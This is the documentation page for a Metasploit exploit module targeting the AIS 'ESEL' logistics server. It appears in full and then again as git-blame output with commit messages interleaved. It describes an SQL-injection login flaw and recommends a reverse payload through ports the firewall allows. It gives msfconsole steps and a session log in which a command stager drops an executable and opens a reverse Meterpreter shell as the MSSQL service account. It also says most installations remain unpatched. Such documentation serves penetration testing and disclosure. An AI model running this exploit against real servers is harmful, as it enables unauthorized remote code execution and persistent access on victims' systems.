documentation/modules/exploit/windows/misc/ais_esel_server_rce.md

## Description

    This module will execute an arbitrary payload on an "ESEL" server used by the
    AIS logistic software. The server typically listens on port 5099 without TLS.
    There could also be server listening on 5100 with TLS but the port 5099 is
    usually always open.
    The login process is vulnerable to an SQL Injection. Usually a MSSQL Server
    with the sa user is in place.

    This module was verified on version 67 but it should also run on lower versions.
    An fixed version was created by AIS in September 2017. However most systems
    have not been updated.`

    In regard to the payload, unless there is a closed port in the web server,
    you dont want to use any bind payload. You want a "reverse" payload,
    probably to your port 80 or to any other outbound port allowed on the firewall.

    Currently, one delivery method is supported

    This method takes advantage of the Command Stager subsystem. This allows using
    various techniques, such as using a TFTP server, to send the executable. By default
    the Command Stager uses 'wcsript.exe' to generate the executable on the target.

    NOTE: This module will leave a payload executable on the target system when the
    attack is finished.

## Vulnerable Application

  The application is not publicily available. It was tested on Esel version 67 but should also work an versions below.

## Verification Steps

  1. Start `msfconsole`
  2. `use exploit/windows/misc/ais_esel_server_rce`
  3. `set RHOSTS <IP>`
  4. `check`
  5. **Verify** "Server is vulnerable"
  6. `run`
  7. **Verify** Session opened

## Scenarios

    msf5 > use exploit/windows/misc/ais_esel_server_rce
    msf5 exploit(windows/misc/ais_esel_server_rce) > set rhosts 10.66.75.212
    rhosts => 10.66.75.212
          msf5 exploit(windows/misc/ais_esel_server_rce) > check
          [+] 10.66.75.212:5099 - The target is vulnerable.
    msf5 exploit(windows/misc/ais_esel_server_rce) > run

    [*] Started reverse TCP handler on 10.66.75.208:4444
    [+] 10.66.75.212:5099 - Correct response received => Data send successfully
    [+] 10.66.75.212:5099 - Correct response received => Data send successfully
    [*] 10.66.75.212:5099 - Command Stager progress -   1.47% done (1499/102292 bytes)
    [+] 10.66.75.212:5099 - Correct response received => Data send successfully
    [*] 10.66.75.212:5099 - Command Stager progress -   2.93% done (2998/102292 bytes)
    [+] 10.66.75.212:5099 - Correct response received => Data send successfully
          ...
    [*] 10.66.75.212:5099 - Command Stager progress -  99.55% done (101827/102292 bytes)
    [+] 10.66.75.212:5099 - Correct response received => Data send successfully
    [*] Sending stage (179779 bytes) to 10.66.75.212
    [*] 10.66.75.212:5099 - Command Stager progress - 100.00% done (102292/102292 bytes)
    [!] 10.66.75.212:5099 - The payload is left on the client in the %TEMP% Folder of the corresponding user.
    [*] 10.66.75.212:5099 - Stager should now be executed. Waiting for 20 seconds..
    [*] Meterpreter session 1 opened (10.66.75.208:4444 -> 10.66.75.212:57107) at 2019-03-27 11:04:29 +0100

    meterpreter > getuid
    Server username: NT Service\MSSQL$AIS
add documentation 2019-04-25 12:18:31 +02:00			`## Description`

			`This module will execute an arbitrary payload on an "ESEL" server used by the`
			`AIS logistic software. The server typically listens on port 5099 without TLS.`
			`There could also be server listening on 5100 with TLS but the port 5099 is`
			`usually always open.`
			`The login process is vulnerable to an SQL Injection. Usually a MSSQL Server`
			`with the sa user is in place.`

			`This module was verified on version 67 but it should also run on lower versions.`
			`An fixed version was created by AIS in September 2017. However most systems`
			have not been updated.`

			`In regard to the payload, unless there is a closed port in the web server,`
			`you dont want to use any bind payload. You want a "reverse" payload,`
			`probably to your port 80 or to any other outbound port allowed on the firewall.`

			`Currently, one delivery method is supported`

			`This method takes advantage of the Command Stager subsystem. This allows using`
			`various techniques, such as using a TFTP server, to send the executable. By default`
			`the Command Stager uses 'wcsript.exe' to generate the executable on the target.`

			`NOTE: This module will leave a payload executable on the target system when the`
			`attack is finished.`

			`## Vulnerable Application`

			`The application is not publicily available. It was tested on Esel version 67 but should also work an versions below.`

			`## Verification Steps`

			1. Start `msfconsole`
			2. `use exploit/windows/misc/ais_esel_server_rce`
			3. `set RHOSTS <IP>`
			4. `check`
			`5. Verify "Server is vulnerable"`
			6. `run`
			`7. Verify Session opened`

			`## Scenarios`

catch false positive spaces at eol from code indent 2020-01-28 14:28:18 -05:00			`msf5 > use exploit/windows/misc/ais_esel_server_rce`
add documentation 2019-04-25 12:20:12 +02:00			`msf5 exploit(windows/misc/ais_esel_server_rce) > set rhosts 10.66.75.212`
			`rhosts => 10.66.75.212`
			`msf5 exploit(windows/misc/ais_esel_server_rce) > check`
			`[+] 10.66.75.212:5099 - The target is vulnerable.`
			`msf5 exploit(windows/misc/ais_esel_server_rce) > run`

catch false positive spaces at eol from code indent 2020-01-28 14:28:18 -05:00			`[*] Started reverse TCP handler on 10.66.75.208:4444`
spelling fixes on docs 2023-10-10 14:46:18 -04:00			`[+] 10.66.75.212:5099 - Correct response received => Data send successfully`
			`[+] 10.66.75.212:5099 - Correct response received => Data send successfully`
add documentation 2019-04-25 12:20:12 +02:00			`[*] 10.66.75.212:5099 - Command Stager progress - 1.47% done (1499/102292 bytes)`
spelling fixes on docs 2023-10-10 14:46:18 -04:00			`[+] 10.66.75.212:5099 - Correct response received => Data send successfully`
add documentation 2019-04-25 12:20:12 +02:00			`[*] 10.66.75.212:5099 - Command Stager progress - 2.93% done (2998/102292 bytes)`
spelling fixes on docs 2023-10-10 14:46:18 -04:00			`[+] 10.66.75.212:5099 - Correct response received => Data send successfully`
add documentation 2019-04-25 12:20:12 +02:00			`...`
			`[*] 10.66.75.212:5099 - Command Stager progress - 99.55% done (101827/102292 bytes)`
spelling fixes on docs 2023-10-10 14:46:18 -04:00			`[+] 10.66.75.212:5099 - Correct response received => Data send successfully`
add documentation 2019-04-25 12:20:12 +02:00			`[*] Sending stage (179779 bytes) to 10.66.75.212`
			`[*] 10.66.75.212:5099 - Command Stager progress - 100.00% done (102292/102292 bytes)`
			`[!] 10.66.75.212:5099 - The payload is left on the client in the %TEMP% Folder of the corresponding user.`
			`[*] 10.66.75.212:5099 - Stager should now be executed. Waiting for 20 seconds..`
			`[*] Meterpreter session 1 opened (10.66.75.208:4444 -> 10.66.75.212:57107) at 2019-03-27 11:04:29 +0100`

			`meterpreter > getuid`
			`Server username: NT Service\MSSQL$AIS`
add documentation 2019-04-25 12:18:31 +02:00